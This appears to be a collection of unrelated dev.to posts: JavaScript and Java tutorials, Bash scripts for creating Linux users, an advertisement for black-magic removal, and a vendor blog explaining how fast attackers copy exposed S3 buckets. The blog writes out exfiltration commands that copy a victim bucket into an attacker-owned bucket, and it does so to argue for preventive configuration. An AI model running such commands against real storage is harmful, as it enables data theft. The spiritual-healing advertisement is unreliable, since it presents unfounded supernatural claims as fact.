Photo by Growtika on Unsplash If you work with JavaScript, then you might have encountered...
0
2024-07-02T14:35:35
https://blog.stackademic.com/a-guide-to-higher-order-functions-in-javascript-65d061b0465c
javascript, beginners, programming
Photo by [Growtika](https://unsplash.com/@growtika?utm_source=medium&utm_medium=referral) on [Unsplash](https://unsplash.com?utm_source=medium&utm_medium=referral)

If you work with JavaScript, you might have encountered higher-order functions. This is not to say that they are limited to JavaScript; on the contrary, higher-order functions are a fundamental aspect of functional programming found in various programming languages. The ability to use higher-order functions is linked to a language's support for functional programming and the programming paradigm in play. In this article we'll dig deeper into what higher-order functions are, their use cases, benefits, and some common mistakes encountered while using them in JavaScript.

---

### What is a higher-order function?

A higher-order function is a function that takes one or more functions as arguments or returns a function as its result. In that definition lie the key characteristics for identifying a higher-order function:

* Takes a function as an argument.
* Returns a function.

This whole concept of higher-order functions in programming is borrowed from mathematics, specifically from the field of functional programming and lambda calculus (a little nerdy note 😁). In lambda calculus and mathematical logic, functions are considered first-class citizens, meaning they can be treated as values, passed as arguments to other functions, and returned as results from functions. For example, the derivative operator in calculus is a higher-order function that maps a function to its derivative, which is also a function. Similarly, in JavaScript, filter() is a higher-order function that works on an array and takes another function as an argument that it uses to return a new, filtered version of the array.

Now that we know what higher-order functions are, let's move on to their applications:

---

### Common Use Cases

### 1. Callback functions

A callback function is simply a function that is passed as an argument to another function and is executed inside the outer function to complete some routine or action. This technique allows a function to call another function. Callback functions are commonly used in asynchronous programming to handle tasks that may take time to complete, such as a network request, or to handle an event, for example a button click or a timer expiration.

Let's implement a simple instance of callbacks in play within an asynchronous task:

```
// Asynchronous application of a callback function
function getDataFromServer(callback) {
  // Simulating a server request with a setTimeout
  setTimeout(function() {
    const data = 'Data from the server';
    callback(data);
  }, 2000);
}

// Callback function to handle the data
function displayData(data) {
  console.log('Data received: ' + data);
}

// Calling the function with the callback
getDataFromServer(displayData);
```

> In this example, we use the getDataFromServer function to simulate a server request using setTimeout and then call the callback function with the data after 2 seconds. The displayData function is the callback that handles the received data. When getDataFromServer is called with displayData as the callback, it logs the received data after 2 seconds. This demonstrates the asynchronous nature of the callback, as the data is handled after the server request is complete.

---

### 2. Array Methods

Array methods are functions that can be called on an array object to perform various operations on the array. There are quite a number of them, but it should be noted that **not all** of them are higher-order functions. The higher-order array methods are:

* forEach()
* map()
* sort()
* filter() and
* reduce()

Let's take a quick look at each:

### 1. forEach()

This higher-order function iterates over an array, executing the function passed in as an argument for each item of the array.
Illustration:

```
const numbers = [1, 2, 3, 4];
numbers.forEach((num) => console.log(num));
// Output: 1, 2, 3, 4
```

### 2. map()

This higher-order function returns a new array built from the results of calling the function passed in as an argument on each element of the original array.

Illustration:

```
const numbers = [1, 2, 3, 4, 5];
const doubledNumbers = numbers.map((num) => num * 2);
console.log(doubledNumbers); // Output: [2, 4, 6, 8, 10]
```

> Each element from the numbers array is multiplied by 2 to create a new array through the **map()** method.

### 3. sort()

As the name suggests, when called on an array it sorts it, by default in ascending order. Under the hood, though, it converts each element into a string and compares their sequences. You can use **sort** without passing in a function as an argument; however, this only works well for string arrays, not for numbers. Hence, if you're going to use **sort** on numbers, you pass in a compare function as an argument. The compare function takes 2 arguments.

Illustration:

```
const numbers = [6, 9, 3, 1];
numbers.sort((a, b) => a - b);
// After sorting: [1, 3, 6, 9]
```

> In the code above:
> A negative return value (a < b) => a will be placed before b
> A zero return value (a == b) => no change
> A positive return value (a > b) => b will be placed before a

### 4. filter()

This method returns a new array with all elements that satisfy the condition implemented by the function passed in. The function passed should always return a boolean value.

```
const numbers = [1, 2, 3, 4];
const evenNumbers = numbers.filter((num) => num % 2 === 0);
// Result: [2, 4]
```

> The condition in the body of the passed-in function is evaluated for each element in the numbers array to return a new array of only the values that satisfy it.

### 5. reduce()

This method takes in 2 arguments: a callback function and an initial value. The callback function takes 2 parameters, an accumulator (which is set to the initial value at the start) and the current value, and runs on each element in the array to return a single value in the end.

Illustration:

```
const numbers = [1, 2, 3, 4, 5];
const sum = numbers.reduce(function(acc, num) {
  return acc + num;
}, 0);
console.log(sum); // Output: 15
```

> The value of acc is 0 and that of num is the first item of the array at the start of execution. As reduce iterates over the array, the acc value changes to the value returned after summation. This new value of acc is then applied to the next iteration. This continues until the end of the array.

---

### 3. Functional composition

Functional composition is the act of combining multiple smaller functions by chaining them together to obtain a single, more complex function. In this approach, each function in the chain operates on the output of the previous function in the composition chain. To enable functional composition in JavaScript we use a **compose** function. A **compose** function is a higher-order function that takes in two or more functions and returns a new function that applies these functions in right-to-left order.

Let's dive into an example:

* The first step is to define the compose function:

```
const compose = (...functions) => {
  return (input) => {
    return functions.reduceRight((acc, fn) => {
      return fn(acc);
    }, input);
  };
};
```

> In the above implementation, the **compose** function takes in any number of functions as arguments by using the **spread** operator.
> It returns a new function that iterates over the functions in reverse order using **reduceRight**, applying each function to the accumulated result.
* The next step is to use the compose function:

```
const addOne = x => x + 1;
const multiplyByTwo = x => x * 2;

const addOneAndMultiplyByTwo = compose(multiplyByTwo, addOne);
console.log(addOneAndMultiplyByTwo(5)); // Output: 12
```

> Above, the functions passed to compose are applied from right to left: the entered value first has one added to it and is then multiplied by 2.

---

### Benefits of Higher Order Functions

We have seen that there are quite a number of applications for higher-order functions, which indicates that they offer programmers real benefits. Let's take a look at these benefits:

* **Abstraction**: Higher-order functions allow you to hide implementation details behind clear function names, improving the readability and understanding of code. For instance, without this type of function, iterating over arrays would require loops, which can clutter code, especially in a large codebase, and make it more complicated.
* **Reusability**: Higher-order functions encapsulate shared logic in reusable functions, so it can be reapplied throughout the codebase without being recreated from scratch at every instance.
* **Immutability**: Many higher-order functions operate on data immutably, creating new structures instead of modifying existing ones. This helps avoid unintended side effects and makes your code more predictable and easier to debug.
* **Modularity**: Higher-order functions facilitate breaking down complex problems into smaller, manageable parts, promoting modular design.

---

### Common mistakes when working with Higher Order Functions (HOFs)

Higher-order functions offer numerous benefits, as seen above, but it's essential to be aware of the potential pitfalls that can cause bugs and unexpected results. Some common mistakes to avoid:

* **Not returning a value**: Most HOFs like map, filter, and reduce expect the function passed in as an argument to return a value for each element processed. Forgetting to return a value can disrupt the chain and lead to undefined results.
* **Not using the correct syntax**: HOFs can be complex, and it's easy to make syntax errors when creating or using them. A good rule of thumb is to double-check the syntax and ensure functions are properly defined and called.
* **Not using pure functions**: The functions used with HOFs should not cause side effects; they should return the same output for a given input, i.e. be pure functions. Using them in an impure manner can lead to unexpected behavior that makes debugging a nightmare.
* **Overusing composition**: Functional composition is a powerful programming technique, but excessive nesting of HOFs can increase the complexity of code, making it harder to read and understand. Aim for a balance between conciseness and clarity, breaking down complex transformations into smaller, more readable steps if necessary.

---

### Conclusion

As we reach the end, some key takeaways are:

1. Higher-order functions are functions that either take other functions as arguments or return them as output.
2. Higher-order functions have many use cases, among them:
   * Callback functions,
   * Array methods,
   * Functional composition, etc.
3. Higher-order functions benefit programmers by providing:
   * Abstraction
   * Reusability
   * Immutability
   * Modularity
4. There are common mistakes that we may encounter when working with higher-order functions.

---

I hope this blog inspires a deeper understanding of higher-order functions and how you might be able to leverage them to solve real-world problems. The journey of learning is never-ending. Happy coding!
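P.S. As a final sketch, the "not returning a value" pitfall described in the mistakes section can be made concrete. The variable names below are purely illustrative:

```
const numbers = [1, 2, 3];

// Pitfall: the arrow function has a block body but never returns,
// so every element maps to undefined
const broken = numbers.map((num) => { num * 2; });

// Fix: return the transformed value (a concise arrow body returns implicitly)
const doubled = numbers.map((num) => num * 2);

console.log(broken);  // [ undefined, undefined, undefined ]
console.log(doubled); // [ 2, 4, 6 ]
```

The block-bodied arrow silently evaluates `num * 2` and discards it, which is exactly how a missing `return` "disrupts the chain and leads to undefined results".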
muchai_joseph
1,909,043
Average City Temperature Calculation Interview Question EPAM
Problem Statement: Average Temperature Calculation You are tasked with implementing a Java...
0
2024-07-02T14:30:38
https://dev.to/codegreen/average-city-temperature-calculation-interview-question-epam-ldd
java, collections, epam, coding
## Problem Statement: Average Temperature Calculation

You are tasked with implementing a Java method that calculates and prints the average temperature for each city from given arrays of cities and temperatures.

Constraints:

You are provided with two arrays:

`String[] cities`: An array where each element represents the name of a city.
`int[] temperatures`: An array where each element represents the temperature recorded for the corresponding city in the cities array.

> The length of both arrays will be the same.
> Duplicate city names may exist in the cities array, and the corresponding entries of temperatures should all be considered when calculating the average temperature of each city.
> Temperatures are represented as integers.

Example:

Given the following arrays:

```
String[] cities = {"New York", "Chicago", "New York", "Chicago", "Los Angeles"};
int[] temperatures = {75, 70, 80, 72, 85};
```

Your method should output:

```
Average temperature in New York: 77.5
Average temperature in Chicago: 71.0
Average temperature in Los Angeles: 85.0
```

-----------------------------------------

## Solution

```java
// A Pair class is created to keep track of the running sum of temperatures
// and the number of readings for a city
private static class Pair {
    public int sum;
    public int count;

    public void addNewTemperature(int temperature) {
        this.sum = this.sum + temperature;
        this.count = this.count + 1;
    }

    public double calculateAvgTemperature() {
        return (double) sum / count;
    }
}
```

```java
private static void printAverageTemperature(String[] cities, int[] temperatures) {
    Map<String, Pair> citiesMap = new HashMap<>();
    for (int i = 0; i < cities.length; i++) {
        String currentCity = cities[i];
        // fetch the existing pair for the current city, or create a new one
        Pair pair = citiesMap.get(currentCity) == null ? new Pair() : citiesMap.get(currentCity);
        // add the new temperature to the running sum and increment the count by 1
        pair.addNewTemperature(temperatures[i]);
        // put the pair back into the map
        citiesMap.put(currentCity, pair);
    }
    citiesMap.forEach((key, pair) -> {
        System.out.println("Average temperature in " + key + ": " + pair.calculateAvgTemperature());
    });
}
```
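The same grouping can also be expressed with the Streams API, which handles the sum/count bookkeeping via `Collectors.averagingInt`. This is a sketch of an alternative, not part of the original solution; the class and method names are illustrative:

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.stream.Collectors;
import java.util.stream.IntStream;

public class AverageTemperature {
    // Returns city -> average temperature, preserving first-seen city order
    static Map<String, Double> averageByCity(String[] cities, int[] temperatures) {
        return IntStream.range(0, cities.length)
                .boxed()
                .collect(Collectors.groupingBy(
                        i -> cities[i],
                        LinkedHashMap::new,
                        Collectors.averagingInt(i -> temperatures[i])));
    }

    public static void main(String[] args) {
        String[] cities = {"New York", "Chicago", "New York", "Chicago", "Los Angeles"};
        int[] temperatures = {75, 70, 80, 72, 85};
        averageByCity(cities, temperatures).forEach((city, avg) ->
                System.out.println("Average temperature in " + city + ": " + avg));
    }
}
```

Using a `LinkedHashMap` as the map factory keeps the output in the order cities first appear, which a plain `HashMap` does not guarantee.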
manishthakurani
1,909,042
How does Kalajadu removal function differently from other methods of spiritual clearing
Introduction: The issue of Kalajadu removal resonates deeply with many cultures and belief systems...
0
2024-07-02T14:29:39
https://dev.to/astrologer_sharma_53a12bd/how-does-kalajadu-removal-function-differently-from-other-methods-of-spiritual-clearing-3ck0
Introduction: The issue of [Kalajadu removal](https://www.bestpsychichealers.com/) resonates deeply with many cultures and belief systems throughout the world. In order to understand how it differs from other methods of spiritual clearing, it is necessary to examine its principles, practices, and cultural contexts. We explore this fascinating topic in the following article. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j2odba52yyecwn7re67w.png) Understanding Kalajadu Removal: Kalajadu is often perceived as a malevolent form of magic practiced with ill intent to harm others through supernatural means. Those who believe they are affected by Kalajadu may experience a range of distressing symptoms, from physical ailments to psychological disturbances and unexplained misfortunes in life. Principles of Kalajadu Removal: Kalajadu removal operates on the premise that the negative effects of black magic can be identified, neutralized, and ultimately eradicated through specific rituals, prayers, and spiritual interventions. Unlike general spiritual clearing or purification methods, which focus on cleansing one’s aura or environment from negative energies, Kalajadu removal aims to specifically counteract the harmful spells and influences cast by practitioners of black magic. Differentiating Factors: Targeted Approach: Kalajadu removal techniques are highly specialized and often require practitioners with specific knowledge and skills in identifying and combating black magic spells. This targeted approach contrasts with broader spiritual clearing methods that may focus on general purification and positive energy enhancement. Cultural Context: The practice of Kalajadu removal is deeply embedded in cultural and religious contexts where beliefs in black magic and its consequences are prevalent.
This cultural sensitivity influences the rituals, prayers, and remedies used in Kalajadu removal, making it distinct from more universal spiritual practices. Complex Rituals and Mantras: Kalajadu removal often involves intricate rituals, recitations of sacred mantras (chants), and offerings aimed at appeasing deities or spirits believed to have the power to counteract and neutralize black magic effects. These rituals may vary widely depending on regional traditions and the severity of the perceived black magic affliction. Consultation with Specialists: Those seeking Kalajadu removal typically consult specialists or practitioners who have specific knowledge and experience in dealing with black magic. These practitioners may be priests, spiritual healers, or individuals recognized within their communities for their expertise in combating negative supernatural influences. Psychological and Emotional Support: Beyond the ritualistic aspects, Kalajadu removal often includes providing psychological and emotional support to individuals affected by black magic. This holistic approach acknowledges the mental distress and fear that often accompany beliefs in supernatural afflictions. Methods Used in Kalajadu Removal : Purification Rituals: Rituals involving the use of holy water, sacred herbs, or incense to cleanse the affected person or space from negative energies associated with Kalajadu. Prayer and Meditation: Intensive prayer sessions and meditation practices aimed at invoking divine protection and strength to combat the effects of black magic. Offerings and Sacrifices: Offering specific items or performing sacrificial rituals as appeasement to deities or spirits believed to be involved in the black magic. Divination and Diagnosis: Using divination tools such as astrology, tarot cards, or spiritual consultations to diagnose the nature and source of the black magic affliction. 
Amulets and Talismans: Providing individuals with protective amulets or talismans believed to ward off negative energies and provide ongoing protection against future black magic attacks. Effectiveness and Challenges : The effectiveness of Kalajadu removal practices is often measured by the alleviation of symptoms and the restoration of peace and well-being in the affected individual’s life. However, challenges may arise due to varying beliefs, cultural interpretations, and the subjective nature of perceived black magic afflictions. Conclusion : [Kalajadu removal ](https://www.bestpsychichealers.com/)functions differently from other methods of spiritual clearing primarily due to its specialized focus on combating the specific harms caused by black magic. It involves complex rituals, cultural sensitivities, and a deep-seated belief in supernatural influences that shape its unique approach. By understanding these differences, individuals seeking Kalajadu removal can make informed decisions about the methods and practitioners they choose to consult in their quest for spiritual healing and protection. Contact Us: Call: +19297549009 Website: [www.bestpsychichealers.com](https://www.bestpsychichealers.com/)
astrologer_sharma_53a12bd
1,909,030
Automating User and Group Creation Using Bash script
Automating the creation of users and groups can help with administrative tasks and ensure adequate...
0
2024-07-02T14:29:39
https://dev.to/adebimpe_peter_285cdfed0c/automating-user-and-group-creation-using-bash-script-a00
bash, linux
Automating the creation of users and groups can help with administrative tasks and ensure consistency across systems. This article demonstrates how to create a Bash script that reads user and group information from a file and processes it accordingly.

**Below is a Bash script that reads from a file called users.txt, which contains usernames and groups, and then creates the users and groups on the system.**

```
#!/bin/bash

# Check if running as root
if [[ $UID -ne 0 ]]; then
  echo "This script must be run as root"
  exit 1
fi

# Define the input file, log file, and secure password file
INPUT_FILE="$1"
LOG_FILE="/var/log/user_management.log"
PASSWORD_FILE="/var/secure/user_passwords.csv"

# Check if the input file was provided and exists
if [[ -z "$INPUT_FILE" ]]; then
  echo "No input file provided."
  exit 1
fi

if [[ ! -f "$INPUT_FILE" ]]; then
  echo "File $INPUT_FILE not found."
  exit 1
fi

# Create the log file and password file if they don't exist
touch "$LOG_FILE"
mkdir -p /var/secure
touch "$PASSWORD_FILE"

# Function to generate a random password
generate_password() {
  tr -dc A-Za-z0-9 </dev/urandom | head -c 12
}

# Function to log messages
log_message() {
  echo "$1" | tee -a "$LOG_FILE"
}

log_message "Backing up created files"

# Backup existing files
cp "$PASSWORD_FILE" "${PASSWORD_FILE}.bak"
cp "$LOG_FILE" "${LOG_FILE}.bak"

# Set permissions for password file
chmod 600 "$PASSWORD_FILE"

# Read the input file line by line
while IFS=';' read -r username groups || [[ -n "$username" ]]; do
  # Ignore whitespace
  username=$(echo "$username" | sed 's/ //g')
  groups=$(echo "$groups" | sed 's/ //g')

  # Parse the username and groups
  echo "$username"
  echo "$groups"

  # Create the user and their personal group if they don't exist
  if id "$username" &>/dev/null; then
    log_message "User $username already exists. Skipping..."
  else
    # Create a personal group for the user
    groupadd "$username"

    # Create the user with their personal group
    useradd -m -s /bin/bash -g "$username" "$username"
    if [ $? -eq 0 ]; then
      log_message "User $username created with home directory."
    else
      log_message "Failed to create user $username."
      continue
    fi

    # Generate a random password and set it for the user with chpasswd
    PASSWORD=$(generate_password)
    echo "$username:$PASSWORD" | chpasswd
    if [ $? -eq 0 ]; then
      log_message "Password for user $username set."
    else
      log_message "Failed to set password for user $username."
    fi

    # Store the password securely
    echo "$username,$PASSWORD" >> "$PASSWORD_FILE"

    # Set the correct permissions for the home directory
    chmod 700 /home/"$username"
    chown "$username":"$username" /home/"$username"
    log_message "Home directory permissions set for user $username."
  fi

  # Add user to additional groups
  if [ -n "$groups" ]; then
    IFS=',' read -r -a groups_ARRAY <<< "$groups"
    for groups in "${groups_ARRAY[@]}"; do
      # Create the group if it doesn't exist
      if ! getent group "$groups" > /dev/null 2>&1; then
        groupadd "$groups"
        log_message "group $groups created."
      fi
      # Add the user to the group
      usermod -a -G "$groups" "$username"
      if [ $? -eq 0 ]; then
        log_message "User $username added to groups $groups."
      else
        log_message "Failed to add user $username to groups $groups."
      fi
    done
  fi
done < "$INPUT_FILE"

log_message "User creation process completed."
```

## Breakdown of the script

Check if Running as Root:

```
if [[ $UID -ne 0 ]]; then
  echo "This script must be run as root"
  exit 1
fi
```

Define Input, Log, and Password Files:

```
INPUT_FILE="$1"
LOG_FILE="/var/log/user_management.log"
PASSWORD_FILE="/var/secure/user_passwords.csv"
```

Check if Input File Exists:

```
if [[ -z "$INPUT_FILE" ]]; then
  echo "No input file provided."
  exit 1
fi

if [[ ! -f "$INPUT_FILE" ]]; then
  echo "File $INPUT_FILE not found."
  exit 1
fi
```

Create Log and Password Files:

```
touch "$LOG_FILE"
mkdir -p /var/secure
touch "$PASSWORD_FILE"
```

Generate Random Password and log message functions:

```
generate_password() {
  tr -dc A-Za-z0-9 </dev/urandom | head -c 12
}

log_message() {
  echo "$1" | tee -a "$LOG_FILE"
}
```

Backup Existing Files:

```
log_message "Backing up created files"
cp "$PASSWORD_FILE" "${PASSWORD_FILE}.bak"
cp "$LOG_FILE" "${LOG_FILE}.bak"
```

Set Permissions for Password File:

```
chmod 600 "$PASSWORD_FILE"
```

Read Input File and Process Each Line:

```
while IFS=';' read -r username groups || [[ -n "$username" ]]; do
  username=$(echo "$username" | sed 's/ //g')
  groups=$(echo "$groups" | sed 's/ //g')
```

Create User and Groups:

```
if id "$username" &>/dev/null; then
  log_message "User $username already exists. Skipping..."
else
  groupadd "$username"
  useradd -m -s /bin/bash -g "$username" "$username"
  if [ $? -eq 0 ]; then
    log_message "User $username created with home directory."
  else
    log_message "Failed to create user $username."
    continue
  fi
  PASSWORD=$(generate_password)
  echo "$username:$PASSWORD" | chpasswd
  if [ $? -eq 0 ]; then
    log_message "Password for user $username set."
  else
    log_message "Failed to set password for user $username."
  fi
  echo "$username,$PASSWORD" >> "$PASSWORD_FILE"
  chmod 700 /home/"$username"
  chown "$username":"$username" /home/"$username"
  log_message "Home directory permissions set for user $username."
fi
```

Add User to Additional Groups:

```
if [ -n "$groups" ]; then
  IFS=',' read -r -a groups_ARRAY <<< "$groups"
  for groups in "${groups_ARRAY[@]}"; do
    if ! getent group "$groups" > /dev/null 2>&1; then
      groupadd "$groups"
      log_message "group $groups created."
    fi
    usermod -a -G "$groups" "$username"
    if [ $? -eq 0 ]; then
      log_message "User $username added to groups $groups."
    else
      log_message "Failed to add user $username to groups $groups."
    fi
  done
fi
```

Complete User Creation Process:

```
done < "$INPUT_FILE"
log_message "User creation process completed."
```

Example users.txt File

Here is an example of what the users.txt file might look like:

```
light; umanager,datadev,devops
tosingh; datadev,devops
peter; umanager
```

**Running the Script**

1. Save the script to a file, e.g., create_users.sh.
2. Ensure the script is executable.
3. Run the script with the input file as an argument.

```
chmod +x create_users.sh
sudo ./create_users.sh users.txt
```

After running, the password file and log file should contain the information needed. You can learn more about this and much more by registering on HNG:
- https://hng.tech/internship
- https://hng.tech/premium
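Before pointing the full script at a real system, the `generate_password` helper can be sanity-checked on its own. This is a standalone sketch that reuses the same one-liner from the script:

```shell
#!/bin/bash
# Same generator as in the script: 12 random alphanumeric characters
generate_password() {
  tr -dc A-Za-z0-9 </dev/urandom | head -c 12
}

PASSWORD=$(generate_password)
echo "generated: $PASSWORD"
echo "length: ${#PASSWORD}"   # always 12, since head -c 12 caps the output
```

Running it a few times confirms the passwords are 12 characters long and contain only `A-Za-z0-9`, which is exactly what `tr -dc` filters for.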
adebimpe_peter_285cdfed0c
1,909,041
Gone in 120 seconds
This article was originally published on the Resourcely blog, and is guest-written by Haoxi...
0
2024-07-02T14:25:44
https://dev.to/resourcely/gone-in-60-seconds-3gcl
security, cybersecurity, hacks
This article was [originally published](https://www.resourcely.io/post/cloud-exfil-speed) on the Resourcely blog, and is guest-written by Haoxi Tan. There's been a significant increase in the number of SaaS and cloud-based data breaches, from [API abuse](https://www.bleepingcomputer.com/news/security/trello-api-abused-to-link-email-addresses-to-15-million-accounts/) and data theft from [exposed cloud assets](https://www.bleepingcomputer.com/news/security/misconfigured-firebase-instances-leaked-19-million-plaintext-passwords/) to straight-up "login and exfil" using stolen credentials (such as in the case of the [Snowflake hacking spree](https://arstechnica.com/security/2024/06/ticketmaster-and-several-other-snowflake-customers-hacked/)), and cloud-based data breaches show no signs of slowing down. Cloud providers like AWS, GCP, and Azure are called "Public Cloud" for a reason - anyone can sign up and use them, including attackers. It takes minutes for an attacker to open a new account and get access to virtually unlimited data storage and compute, often hosted in the same high-speed data centers as their victim's assets. ## Cloud-to-cloud exfiltration Let's take a classic example of bad actors stealing data: copying files from a publicly available AWS S3 bucket. If an attacker is downloading files from the S3 bucket to their local machine, the speed would depend on how fast their internet is, how many hops they are using for VPN, and so on. However, even with a very slow network speed and the default AWS API client, they can easily download up to 20 files a second to their local machine by running a simple command: `aws s3 cp s3://bucketname . --recursive` ![Exfiltration log results using the default AWS CLI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rsfi3vi5zrt35dpxzaiq.png) This command was run behind a VPN on a home network connection (with an average internet speed of 10MB/s) for about 200 seconds.
The default aws cli isn't very fast, and was only able to utilize a small part of the bandwidth, downloading at around 140 KB/s, and yet it was able to download around 4000 files from an open S3 bucket in 200 seconds. An optimized tool called s3p, which massively parallelizes S3 API calls, achieved much better results performing the same data exfiltration in the same network environment: over 800 files per second at top speed: `s3p cp --bucket bucketname --to-folder` ![Exfiltration log results using s3p](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fgq4he442422qzmlpc11.png) Even worse, if an attacker runs s3p on an EC2 instance in the same cloud region as their victim's data to copy the files into their own S3 bucket, the transfer would be processed entirely from inside the cloud provider's data centers, like so: `s3p cp --bucket bucketname --to-bucket attackerbucket` They can copy all the data to their own AWS account at massive speeds, then use other VPS (Virtual Private Server) instances in [bulletproof hosting](https://en.wikipedia.org/wiki/Bulletproof_hosting) providers to exfiltrate that data outside of AWS where takedown is much more difficult. ![A summary table of results exfiltrating data](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eyptjiygwdq2hr3ipbf7.png) Using s3p on an EC2 instance to optimize the number of API calls, cloud-to-cloud transfers could reach up to 8 gigabytes per second. That means for an exposed S3 bucket with 1TB of data, it could all end up in the attacker's AWS account in just over 2 minutes. By the time the incident is detected, the data would have already ended up for sale in a hacking forum. ## APT: Advanced Persistent Teenagers As companies move their assets to the cloud and migrate from on-premise applications to SaaS apps, attackers are constantly innovating. One particular Advanced Persistent Threat (APT) group called [Scattered Spider](https://attack.mitre.org/groups/G1015/) (a.k.a.
Octo Tempest) is a group of English-speaking teenagers particularly well versed in exploiting cloud-based applications and services. ![Screenshot of a news article mentioning Scattered Spider](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yl6pn67g5eu1tfprg65f.png) The group had focused on SIM swapping attacks and ransomware in the past to gain access to large companies, but recently pivoted towards [data theft attacks in cloud and SaaS systems](https://www.bleepingcomputer.com/news/security/scattered-spider-hackers-switch-focus-to-cloud-apps-for-data-theft/) for extortion purposes without deploying ransomware. Octo Tempest was named [one of the most dangerous financial hacking groups by Microsoft](https://www.bleepingcomputer.com/news/security/microsoft-octo-tempest-is-one-of-the-most-dangerous-financial-hacking-groups/), and it's gone cloud native. ![Cloud-based MITRE ATT&CK techniques employed by Scattered Spider](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0ofxkuau9t2v94n6em0l.png) Google's Mandiant [said](https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications/) that after the reconnaissance phase, the group performs "exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets''. ## No response fast enough With the speed of the cloud and attackers moving away from ransomware deployment to extortion via data theft, it's virtually impossible to respond fast enough to these incidents. Once an exposed, misconfigured cloud asset has been discovered by attackers, exfiltration can start in a matter of seconds. 
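How little time defenders actually have can be put into numbers with a quick back-of-the-envelope calculation, using the roughly 8 GB/s cloud-to-cloud top speed measured earlier and CloudTrail's typical event-delivery delay of up to 300 seconds (both figures are approximations):

```python
# Approximate figures: ~8 GB/s top speed (measured with s3p cloud-to-cloud),
# ~300 s before CloudTrail delivers the first API-call event
throughput_gb_per_s = 8
cloudtrail_delay_s = 300

# Data an attacker can move before the first log event even arrives
exfiltrated_tb = throughput_gb_per_s * cloudtrail_delay_s / 1000
print(f"moved before first log event: {exfiltrated_tb:.1f} TB")  # 2.4 TB

# Time to drain a 1 TB bucket at that rate
drain_1tb_s = 1000 / throughput_gb_per_s
print(f"time to copy 1 TB: {drain_1tb_s:.0f} s")  # 125 s
```

At 8 GB/s a 1 TB bucket is gone in about two minutes, while roughly 2.4 TB can leave before the first CloudTrail event lands.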
Unlike ransomware, which moves across different systems with suspicious hands-on-keyboard activity that can be detected by Endpoint Detection and Response, data exfiltration activity in the cloud looks much like normal data access, and once the data is lost it cannot be recovered by incident response. ![Screenshot of AWS CloudTrail documentation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9tbyli1u2ouotc7403cw.png) CloudTrail is the logging service for AWS, central to all other tooling that analyzes logs for security events. The CloudTrail FAQ page notes that an API call event is usually delivered from CloudTrail within 5 minutes (300 seconds) of the API call. Given that the top speed of data exfiltration above is 8GB/s, that gives an attacker the ability to exfiltrate around 2TB of data before the event log is even delivered to your security tooling - and by that point your data is long gone. ## Secure configuration is the only prevention Given there is not enough time to react to a misconfigured cloud asset being breached, proactively securing configuration is the only way to protect against the risk of potential cloud data breaches. To do that, security teams must shift from a reactive, issue-centric view of the world to a proactive, preventative strategy, powered by secure, sensible defaults for configuring cloud resources. Resourcely enables your security, infrastructure and developer teams to create proactive, simple, continuously enforced guardrails to safeguard your cloud resources. [Get started with Resourcely](https://www.resourcely.io/sign-up) to make your organization secure-by-default. Massive shoutout to Jason Craig and Will Bengtson, who had the initial idea for this post.
csreuter
1,908,740
Automating User and Group Management in Linux with a Bash Script
Let's make your manual and tedious repetitive task of creating users and groups for new employees...
0
2024-07-02T14:23:56
https://dev.to/afolabi_harfoh/automating-user-and-group-management-in-linux-with-a-bash-script-2d8f
linux, devops, automation
Let's make your manual and tedious repetitive task of creating users and groups for new employees interesting with bash scripting to boost your productivity as a SysOps Engineer. Before we get into the task, a quick note: this article was made possible by the HNG Internship. HNG is a prestigious program designed to empower young developers and designers with practical skills and experience in software development. Participants engage in real-world projects across various disciplines, including DevOps, web and mobile app development, UI/UX design, and more. This internship is renowned for its hands-on approach, remote work opportunities, and emphasis on collaborative learning and innovation. For more information about the HNG internship, you can visit their [official website](https://hng.tech/) and explore their [internship program](https://hng.tech/internship). ## **Introduction** As a sysops engineer, managing users and groups in a Linux system can be a time-consuming task. However, with the help of automation, this process can be streamlined and made more efficient. In this article, we will explore a bash script that automates the creation of users and groups, assigns users to existing groups, generates secure passwords, and securely stores them. This article walks you through a script that reads user data from a text file and performs these tasks, ensuring secure password generation and logging all actions. **_Prerequisites_** - Basic Knowledge of Linux Commands - Knowledge of the Bash Language - Admin privileges on the system - A text editor such as Nano, vim, or vi, or an IDE such as VSCode. ## **Key Concepts** Before diving into the code, let's familiarize ourselves with some key concepts: 1. **Text File:** The script expects a text file as an argument. This file contains user and group information in the format username;group1,group2,group3.
Each line represents a user, where username is the desired username, and group1, group2, group3 are the groups the user should be assigned to. 2. **Users:** Users are individuals who interact with a Linux system. Each user has a unique username and can belong to one or more groups. 3. **Groups:** Groups are collections of users with similar permissions and access rights. A user can belong to multiple groups. 4. **Automation:** Automation involves using scripts or tools to perform repetitive tasks automatically, reducing manual effort and increasing efficiency. 5. **Secure Passwords:** Secure passwords are randomly generated and provide a higher level of security compared to easily guessable passwords. **_Script Overview_** The provided bash script automates user and group management in Linux systems. Let's break down the code structure: - **Argument Check:** The script checks if a text file is provided as an argument. If not, it displays a usage message and exits. - **Secure Directory Creation:** The script creates a secure directory, /var/secure, to store passwords if it doesn't already exist. This directory is given appropriate permissions to ensure that only authorized users can access it. - **Text File Processing:** The script reads a text file line by line, where each line contains a username and a comma-separated list of groups the user should belong to. - **User and Group Creation:** For each line in the text file, the script performs the following actions: - Checks if the username is empty. If so, it skips to the next line. - Checks if the user already exists. If so, it skips to the next line. - Checks if the group already exists. If not, it creates the group. - Assigns the user to existing groups. - Creates the user and adds them to the specified groups. - Generates a random password for the user. - Sets the password for the user and securely stores it in /var/secure/user_passwords.txt. 
